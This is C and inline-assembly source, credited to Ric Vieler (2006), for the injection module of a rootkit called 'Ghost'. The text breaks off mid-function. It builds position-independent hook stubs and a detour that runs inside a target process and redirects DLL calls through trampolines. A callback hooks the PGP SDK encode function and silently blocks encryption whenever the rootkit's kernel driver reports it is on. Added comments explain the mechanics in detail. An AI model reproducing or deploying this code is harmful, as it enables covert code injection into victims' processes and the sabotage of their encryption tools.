// injectManager
// Copyright Ric Vieler, 2006
// Hook Dynamic Link Libraries
#include "ntddk.h"
#include "Ghost.h"
#include "hookManager.h"
#include "injectManager.h"
#include "IoManager.h"
#include "parse86.h"
#include <stdarg.h>
#include <stdio.h>
// Paged code, optimizer off: the two naked functions below locate themselves
// with inline asm and are copied out of this module as raw bytes, so the
// compiler must not reorder, inline or drop any of it. No matching
// "#pragma optimize( "", on )" is visible in this listing -- presumably the
// whole file is meant to stay unoptimized; confirm before re-enabling.
#pragma code_seg("PAGE")
#pragma optimize( "", off )
extern PVOID kernel32Base;   // defined in another translation unit
// HookTable .. EndOfInjectedCode is the position-independent region that
// runs inside the target process; DetourFunction derives its own run-time
// base from the link-time distances between these three labels.
static void HookTable( void );
static void DetourFunction( void );
static void EndOfInjectedCode( void );
// Per-hook callbacks. stack[0] is the hooked call's return address and
// stack[1..] its arguments (beforeEncode reads stack[1] and stack[2]).
static DWORD beforeEncode( PDWORD stack, DWORD* callbackReturn, IN_PROCESS_DATA* pCallData );
// Returns TRUE to let the original function run, FALSE to skip it; either
// way *returnParameter is what the original caller receives in EAX.
static DWORD BeforeOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData );
static void AfterOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData );
// Not used in this listing; the value suggests a 5-byte jump sits in front of
// the location it is applied to -- confirm in the code that installs hooks.
#define JUMP_TO_DETOUR_LOCATION -5
// Byte offsets into the per-hook record that starts at HookTable's
// phoney_jump label. HookTable hands the record's run-time address to
// DetourFunction in EDX, which reads [EDX + offset] for each field.
#define CALLDATA_INDEX_LOCATION 0          // hook index
#define CALLDATA_PARAMETERS_LOCATION 4     // number of DWORD arguments
#define CALLDATA_CALLTYPE_LOCATION 8       // CDECL_TYPE or callee-cleans
#define CALLDATA_STACK_OFFSET_LOCATION 12  // extra bytes between EBP+4 and the return address
#define TRAMPOLINE_LOCATION 16             // start of the trampoline bytes
// Not used in this listing -- presumably a search sentinel; confirm elsewhere.
#define START_OF_TRAMPOLINE_PATTERN -1
// Template hook stub plus the per-hook record that follows it.
//
// Nothing in this listing fills in the record, so how and when its fields
// are populated is not visible here (presumably by the code that copies the
// HookTable .. EndOfInjectedCode region into the target process -- confirm).
// With each EMIT_FOUR emitting four bytes (which is what the
// CALLDATA_*_LOCATION offsets require), the record laid out at phoney_jump is:
//   +0   hook index            (initially 0xff bytes)
//   +4   parameter count
//   +8   calling convention
//   +12  stack offset
//   +16  trampoline area       (nine EMIT_FOUR( 0x90 ) = 36 bytes of NOP)
//
// The call/pop sequence obtains the stub's own run-time address, so the stub
// keeps working wherever it has been copied; EAX is restored before the jump
// so the hooked call sees its registers intact. "jmp DetourFunction" is a
// relative jump, so the whole region must be copied as one contiguous block.
void __declspec(naked) HookTable( void )
{
__asm
{
push eax                 // preserve caller's EAX; used as scratch below
xor eax, eax
call phoney_call         // pushes the run-time address of phoney_call
phoney_call:
lea eax, phoney_call     // link-time address of phoney_call
lea edx, phoney_jump     // link-time address of the record
sub edx, eax             // EDX = distance from phoney_call to the record
pop eax                  // EAX = run-time address of phoney_call
add eax, edx             // EAX = run-time address of the record
mov edx, eax             // DetourFunction expects the record pointer in EDX
pop eax                  // restore caller's EAX
jmp DetourFunction
phoney_jump:
// hook record: index, parameter count, call type, stack offset
EMIT_FOUR( 0xff )
EMIT_FOUR( 0x0 )
EMIT_FOUR( 0x0 )
EMIT_FOUR( 0x0 )
// trampoline area (TRAMPOLINE_LOCATION onward), NOP-filled in the template
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
jmp EndOfInjectedCode
}
}
////////////////////////////////
// Injected functions
////////////////////////////////
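///////////////////////////////////////////////////////////////
// DetourFunction
//
// Position-independent body reached from HookTable with EDX pointing at
// that stub's hook record (offsets: CALLDATA_*_LOCATION, TRAMPOLINE_LOCATION).
//   1. saves the incoming registers and reads the record (hook index,
//      parameter count, calling convention, stack offset, trampoline);
//   2. recovers its own run-time base with a call/pop and from that
//      locates the IN_PROCESS_DATA area that follows EndOfInjectedCode;
//   3. computes originalStack, the hooked call's frame: [0] is the
//      return address, [1..parameters] the arguments;
//   4. calls BeforeOriginalFunction; when it returns TRUE, re-pushes the
//      arguments, jumps through the trampoline to the original function,
//      collects EAX and calls AfterOriginalFunction;
//   5. returns straight to the original caller, discarding the arguments
//      itself for callee-cleans hooks and leaving them in place for CDECL.
//
// Corrected here: both callback calls now pass &parameter2return (the
// listing carried "¶meter2return", an HTML-entity mangling of the
// address-of expression), so the callbacks can overwrite the return value.
//
// NOTE(review): the argument copy trusts the per-hook parameter count; a
// wrong count reads beyond the arguments into the caller's frame.
// PUSH_STACKFRAME / POP_STACKFRAME are defined outside this file; the
// "add eax, 4 // pushed ebp" below implies PUSH_STACKFRAME pushes EBP and
// sets EBP = ESP -- confirm against the macro.
///////////////////////////////////////////////////////////////
void __declspec(naked) DetourFunction( void )
{
    PUSH_STACKFRAME();
    {
        DWORD hookIndex;            // record: which hook fired
        DWORD parameters;           // record: number of DWORD arguments
        DWORD callType;             // record: CDECL_TYPE or callee-cleans
        DWORD stackOffset;          // record: extra bytes between EBP+4 and the return address
        PCHAR trampolineFunction;   // record + TRAMPOLINE_LOCATION
        IN_PROCESS_DATA* callData;  // run-time address of the data area after EndOfInjectedCode
        PCHAR codeStart;            // run-time address of DetourFunction
        PDWORD originalStack;       // [0] return address, [1..parameters] arguments
        DWORD tempStack;
        int loop;
        int parameters4return;      // DWORDs to discard on return (callee-cleans only)
        DWORD parameter2return = 0; // value handed back to the original caller in EAX
        DWORD continueFlag;
        DWORD register_esp;
        DWORD register_edi;
        DWORD register_esi;
        DWORD register_eax;
        DWORD register_ebx;
        DWORD register_ecx;
        DWORD add2stack;            // bytes to pop after the original returns (CDECL only)
        // setup to call injected functions
        __asm
        {
            // snapshot the registers the hooked call arrived with
            mov register_esp, esp
            mov register_edi, edi
            mov register_esi, esi
            mov register_eax, eax
            mov register_ebx, ebx
            mov register_ecx, ecx
            // get parameters from the hook record (EDX, set by HookTable)
            push edx
            mov edx, [edx+CALLDATA_INDEX_LOCATION]
            mov hookIndex, edx
            pop edx
            push edx
            mov edx, [edx+CALLDATA_PARAMETERS_LOCATION]
            mov parameters, edx
            pop edx
            push edx
            mov edx, [edx+CALLDATA_CALLTYPE_LOCATION]
            mov callType, edx
            pop edx
            push edx
            mov edx, [edx+CALLDATA_STACK_OFFSET_LOCATION]
            mov stackOffset, edx
            pop edx
            push edx
            add edx, TRAMPOLINE_LOCATION
            mov trampolineFunction, edx
            pop edx
            // calculate the start address: run-time address of this label
            // minus its link-time distance from DetourFunction
            xor eax, eax
            call called_without_return
        called_without_return:
            pop eax
            lea ebx, DetourFunction
            lea ecx, called_without_return
            sub ecx, ebx
            sub eax, ecx
            mov codeStart, eax
            // data area: same link-time distance applied to EndOfInjectedCode
            lea ecx, EndOfInjectedCode
            sub ecx, ebx
            add ecx, eax
            mov callData, ecx
            // calculate the last ret address
            mov eax, ebp
            add eax, 4 // pushed ebp
            add eax, stackOffset
            mov originalStack, eax
        }
        // setup return call type: under CDECL the caller cleans, so the
        // arguments pushed below must be popped after the original returns
        if( callType == CDECL_TYPE )
            add2stack = parameters * sizeof( DWORD );
        else
            add2stack = 0;
        // call pre-injected code
        continueFlag = BeforeOriginalFunction( hookIndex, originalStack, &parameter2return, callData );
        if( continueFlag == (DWORD)TRUE )
        {
            // re-push the arguments last-to-first so the original sees them in order
            for( loop = parameters; loop > 0; loop-- )
            {
                tempStack = originalStack[loop];
                __asm push tempStack
            }
            // Call trampoline (jumps to original function)
            //
            // Since trampoline is a jump, the return in
            // the original function will come back here.
            __asm
            {
                // run-time address of return_from_trampoline, relocated like codeStart
                lea ebx, DetourFunction
                lea eax, return_from_trampoline
                sub eax, ebx
                add eax, codeStart
                // construct call: push the return address, then jmp
                push eax
                // adjust stack (mirrors stackOffset from the record -- confirm its meaning
                // against the code that fills the record)
                sub esp, stackOffset
                // restore registers and call
                mov edi, register_edi
                mov esi, register_esi
                mov eax, register_eax
                mov ebx, register_ebx
                mov ecx, register_ecx
                jmp trampolineFunction
            return_from_trampoline:
                add esp, add2stack
                mov parameter2return, eax   // original function's return value
            }
            // call post-injected code
            AfterOriginalFunction( hookIndex, originalStack, &parameter2return, callData );
        }
        // prepare to return: jump directly to the hooked call's return address
        tempStack = *originalStack;
        if( callType == CDECL_TYPE )
            parameters4return = 0;
        else
            parameters4return = parameters;
        __asm
        {
            mov eax, parameter2return
            mov ecx, tempStack
            mov edx, parameters4return
            shl edx, 2                 // DWORDs -> bytes
            add edx, stackOffset
            POP_STACKFRAME();
            add esp, 4                 // drop the original return address
            add esp, edx               // drop callee-cleans arguments plus stackOffset
            jmp ecx
        }
        // Not reached on the path above (it ends in "jmp ecx"); kept as in the original.
        __asm mov edx, trampolineFunction
    }
    POP_STACKFRAME();
    __asm jmp edx
}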
///////////////////////////////////////////////////////////////
// this function is located in the PGP SDK
// dynamic link library (old=PGP_SDK.DLL, new=PGPsdk.dll)
// This function accepts the caller's input and output,
// which may be memory or file based, and converts the input
// into encrypted output
//
// return TRUE to allow encryption
// return FALSE to block encryption
///////////////////////////////////////////////////////////////
DWORD beforeEncode( PDWORD stack, DWORD* callbackReturn, IN_PROCESS_DATA* pCallData )
{
void* contextPtr = (void*)stack[1];
PGPOptionList* optionListPtr = (PGPOptionList*)stack[2];
DWORD dwRet = (DWORD)TRUE;
int index;
int inputType = 0;
void* lpBuffer;
DWORD dwInBufferLen = 0;
PGPOption* currentOption = optionListPtr->options;
PFLFileSpec* fileSpec;
HANDLE deviceHandle;
GHOST_IOCTLDATA control = { 0 };
ULONG status = 0;
// Look at the options in the option list
for( index = 0; index < optionListPtr->numOptions; index++)
{
if( currentOption->type == 1 )
{
// File Input
inputType = 1;
fileSpec = (PFLFileSpec*)currentOption->value;
lpBuffer = fileSpec->data;
dwInBufferLen = (DWORD)pCallData->plstrlenA((LPCSTR)(lpBuffer));
break;
}
else if( currentOption->type == 2 )
{
// Buffer Input
inputType = 2;
lpBuffer = (void*)currentOption->value;
dwInBufferLen = (DWORD)currentOption->valueSize;
break;
}
currentOption++;
}
// Process buffer or file before encryption
if(( inputType == 1 || inputType == 2 ) && ( dwInBufferLen > 0 ))
{
deviceHandle = pCallData->pCreateFileA( pCallData->deviceString,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (deviceHandle != INVALID_HANDLE_VALUE)
{
if( pCallData->pDeviceIoControl( deviceHandle,
GHOST_STATUS_COMMAND,
&control,
sizeof(control), // input
(PVOID)&control,
sizeof(control), // output
&status,
NULL ) )
{
if(control.command == GHOST_ON)
{
// blocking encryption
dwRet = (DWORD)FALSE;
*callbackReturn = PGP_BAD_API;
pCallData->pOutputDebugStringA(pCallData->denyString);
}
else